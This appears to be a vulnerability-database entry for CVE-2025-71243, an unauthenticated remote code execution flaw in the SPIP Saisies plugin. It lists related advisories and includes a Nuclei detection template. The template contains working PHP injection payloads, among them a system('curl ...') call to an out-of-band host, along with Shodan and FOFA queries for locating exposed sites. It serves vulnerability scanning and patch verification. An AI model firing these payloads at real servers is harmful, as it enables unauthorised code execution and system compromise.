| Title | Published | Family |
|---|---|---|
| CVE-2025-71243 | 19 Feb 2026 14:58 | attackerkb |
| Exploit for CVE-2025-71243 | 19 Feb 2026 16:13 | githubexploit |
| CVE-2025-71243 | 19 Feb 2026 16:31 | circl |
| SPIP Code Injection Vulnerability | 19 Feb 2026 00:00 | cnnvd |
| CVE-2025-71243 | 19 Feb 2026 14:58 | cve |
| CVE-2025-71243 SPIP Saisies Plugin < 5.11.1 Remote Code Execution | 19 Feb 2026 14:58 | cvelist |
| SPIP Saisies Plugin Unauthenticated RCE | 9 Mar 2026 18:57 | metasploit |
| CVE-2025-71243 | 19 Feb 2026 16:27 | nvd |
| SPIP Saisies 5.11.0 Remote Code Execution | 24 Feb 2026 00:00 | packetstorm |

| Source | Link |
|---|---|
| vulnerability | www.vulnerability.circl.lu/vuln/cve-2025-71243 |
| chocapikk | www.chocapikk.com/posts/2026/spip-saisies-rce/ |
| github | www.github.com/Chocapikk/CVE-2025-71243 |
| vulnerabletarget | www.vulnerabletarget.com/VT-2025-71243 |

```yaml
id: CVE-2025-71243

info:
  name: SPIP Saisies - Remote Code Execution
  author: omarkurt
  severity: critical
  description: |
    SPIP Saisies plugin 5.4.0 through 5.11.0 contains a remote code execution caused by an unspecified flaw, letting attackers execute arbitrary code on the server, exploit requires no special conditions.
  remediation: |
    Update to version 5.11.1 or later.
  impact:
    Attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  reference:
    - https://vulnerability.circl.lu/vuln/cve-2025-71243
    - https://chocapikk.com/posts/2026/spip-saisies-rce/
    - https://github.com/Chocapikk/CVE-2025-71243
    - https://vulnerabletarget.com/VT-2025-71243
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-71243
    epss-score: 0.05126
    epss-percentile: 0.9137
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 3
    vendor: spip
    product: saisies
    shodan-query: 'http.html:"SPIP"'
    fofa-query: 'app="SPIP"'
  tags: cve,cve2025,spip,rce,oast,vkev

variables:
  rce_payload: "x'/><?php echo md5('{{randstr}}'); ?><input value='x"
  oob_payload: "x'/><?php gethostbyname('{{interactsh-url}}'); ?><input value='x"
  oob_curl: "x'/><?php system('curl+-s+{{interactsh-url}}'); ?><input value='x"

flow: http(1) && (http(2) || http(3) || http(4))

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "Composed-By: SPIP")'
          - 'contains(header, "X-Spip-Cache:")'
        condition: or
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(rce_payload)}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{{md5(randstr)}}")'
          - 'status_code == 200'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(oob_payload)}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code == 200'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(oob_curl)}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100ceacaa1afed50aa38654b94b926d630cbcb002e66fa1ee6e4ed629fec80f6f36022100eed5f9d0a85515e2dcb9eae3084cb351dfc52bb137aa9fabe464d0104bfafb3b:922c64590222798bb761d5b6d8e72950
```